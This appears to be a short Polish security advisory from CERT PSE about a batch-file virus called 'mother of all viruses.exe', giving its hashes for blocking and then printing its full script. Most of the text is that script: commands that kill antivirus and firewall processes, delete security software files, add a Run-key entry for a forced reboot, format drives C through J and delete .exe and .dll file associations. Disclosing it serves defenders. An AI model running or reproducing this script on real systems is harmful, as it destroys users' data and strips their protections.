23 maja został wykryty ciekawy wirus który swoją metodyką działania przypomina “stare dobre czasy”, a sama jego nazwa jest co najmniej intrygująca “mother of all viruses.exe”.

Jako że niewiele silników AV wykrywa jeszcze tego wirusa CERT PSE zachęca administratorów do zabezpieczenia się przed infekcją poprzez blokadę:

Name: mother of all viruses.exe
MD5: 5ce1f52681c134de83e234792a23e982
SHA1: b22b1737da1488cd11b286bce149e6d43d7d4adb
SHA256: 3d5fe4cc8ae119194adc89edfbef8f59a37de476d6d1490d93740272046e79f3

virustotal

Komendy wykonywane przez wirusa to:

 1. @ECHO off
 2. If %date% NEQ —-/–/– goto exit
 3. :exit
 4. rem —
 5. rem Permanently Kill Anti-Virus
 6. net stop “Security Center”
 7. netsh firewall set opmode mode=disable
 8. tskill /A av*
 9. tskill /A fire*
 10. tskill /A anti*
 11. cls
 12. tskill /A spy*
 13. tskill /A bullguard
 14. tskill /A PersFw
 15. tskill /A KAV*
 16. tskill /A ZONEALARM
 17. tskill /A SAFEWEB
 18. cls
 19. tskill /A OUTPOST
 20. tskill /A nv*
 21. tskill /A nav*
 22. tskill /A F-*
 23. tskill /A ESAFE
 24. tskill /A cle
 25. cls
 26. tskill /A BLACKICE
 27. tskill /A def*
 28. tskill /A kav
 29. tskill /A kav*
 30. tskill /A avg*
 31. tskill /A ash*
 32. cls
 33. tskill /A aswupdsv
 34. tskill /A ewid*
 35. tskill /A guard*
 36. tskill /A guar*
 37. tskill /A gcasDt*
 38. tskill /A msmp*
 39. cls
 40. tskill /A mcafe*
 41. tskill /A mghtml
 42. tskill /A msiexec
 43. tskill /A outpost
 44. tskill /A isafe
 45. tskill /A zap*
 46. cls
 47. tskill /A zauinst
 48. tskill /A upd*
 49. tskill /A zlclien*
 50. tskill /A minilog
 51. tskill /A cc*
 52. tskill /A norton*
 53. cls
 54. tskill /A norton au*
 55. tskill /A ccc*
 56. tskill /A npfmn*
 57. tskill /A loge*
 58. tskill /A nisum*
 59. tskill /A issvc
 60. tskill /A tmp*
 61. cls
 62. tskill /A tmn*
 63. tskill /A pcc*
 64. tskill /A cpd*
 65. tskill /A pop*
 66. tskill /A pav*
 67. tskill /A padmin
 68. cls
 69. tskill /A panda*
 70. tskill /A avsch*
 71. tskill /A sche*
 72. tskill /A syman*
 73. tskill /A virus*
 74. tskill /A realm*
 75. cls
 76. tskill /A sweep*
 77. tskill /A scan*
 78. tskill /A ad-*
 79. tskill /A safe*
 80. tskill /A avas*
 81. tskill /A norm*
 82. cls
 83. tskill /A offg*
 84. del /Q /F C:\Program Files\alwils~1\avast4\*.*
 85. del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
 86. del /Q /F C:\Program Files\kasper~1\*.exe
 87. cls
 88. del /Q /F C:\Program Files\trojan~1\*.exe
 89. del /Q /F C:\Program Files\f-prot95\*.dll
 90. del /Q /F C:\Program Files\tbav\*.dat
 91. cls
 92. del /Q /F C:\Program Files\avpersonal\*.vdf
 93. del /Q /F C:\Program Files\Norton~1\*.cnt
 94. del /Q /F C:\Program Files\Mcafee\*.*
 95. cls
 96. del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
 97. del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
 98. del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
 99. del /Q /F C:\Program Files\Norton~1\*.*
 100. cls
 101. del /Q /F C:\Program Files\avgamsr\*.exe
 102. del /Q /F C:\Program Files\avgamsvr\*.exe
 103. del /Q /F C:\Program Files\avgemc\*.exe
 104. cls
 105. del /Q /F C:\Program Files\avgcc\*.exe
 106. del /Q /F C:\Program Files\avgupsvc\*.exe
 107. del /Q /F C:\Program Files\grisoft
 108. del /Q /F C:\Program Files\nood32krn\*.exe
 109. del /Q /F C:\Program Files\nood32\*.exe
 110. cls
 111. del /Q /F C:\Program Files\nod32
 112. del /Q /F C:\Program Files\nood32
 113. del /Q /F C:\Program Files\kav\*.exe
 114. del /Q /F C:\Program Files\kavmm\*.exe
 115. del /Q /F C:\Program Files\kaspersky\*.*
 116. cls
 117. del /Q /F C:\Program Files\ewidoctrl\*.exe
 118. del /Q /F C:\Program Files\guard\*.exe
 119. del /Q /F C:\Program Files\ewido\*.exe
 120. cls
 121. del /Q /F C:\Program Files\pavprsrv\*.exe
 122. del /Q /F C:\Program Files\pavprot\*.exe
 123. del /Q /F C:\Program Files\avengine\*.exe
 124. cls
 125. del /Q /F C:\Program Files\apvxdwin\*.exe
 126. del /Q /F C:\Program Files\webproxy\*.exe
 127. del /Q /F C:\Program Files\panda software\*.*
 128. rem —
 129. echo @echo off>c:windowshartlell.bat
 130. echo break off>>c:windowshartlell.bat
 131. echo shutdown -r -t 11 -f>>c:windowshartlell.bat
 132. echo end>>c:windowshartlell.bat
 133. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
 134. reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
 135. echo You have been HACKED.
 136. format E: /y >nul
 137. format C: /y >nul
 138. format D: /y >nul
 139. format G: /y >nul
 140. format J: /y >nul
 141. format F: /y >nul
 142. START reg delete HKCR/.exe
 143. START reg delete HKCR/.dll
 144. START reg delete HKCR/*
 145. :MESSAGE
 146. ECHO Your computer has been fcked. Have a nice day.
 147. start calc
 148. tskill msnmsgr
 149. tskill firefox
 150. tskill iexplore
 151. tskill LimreWire
 152. tskill explorer
 153. tskill explorer
 154. tskill explorer
 155. tskill explorer
 156. tskill explorer
 157. START %SystemRoot%\system32\notepad.exe